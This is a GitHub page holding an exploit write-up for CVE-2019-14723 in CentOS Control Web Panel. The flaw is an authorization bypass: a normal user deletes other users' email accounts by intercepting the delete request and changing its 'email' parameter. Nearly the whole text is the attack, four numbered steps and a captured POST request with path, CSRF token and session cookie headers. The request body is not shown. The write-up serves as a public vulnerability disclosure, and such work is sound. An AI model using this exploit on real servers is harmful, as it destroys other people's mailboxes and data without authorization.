Skip to content
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
34 lines (31 sloc) 1.27 KB
Exploit Title       : CWP (CentOS Control Web Panel) Delete other email account
Date                : 24 Jul 2019
Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage     :
Software Link       : Not available, user panel only available for lastest version
Version             :
Tested on           : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
CVE-Number          : CVE-2019-14723
Reference	    : N/A
  1. Log in as a normal user.
  2. Go to "Email Accounts"
  3. Try to delete any email account
  4. Intercept the request, and modify parameter "email" to other email address
POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=emaildelete HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 21
Connection: close
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

You can’t perform that action at this time.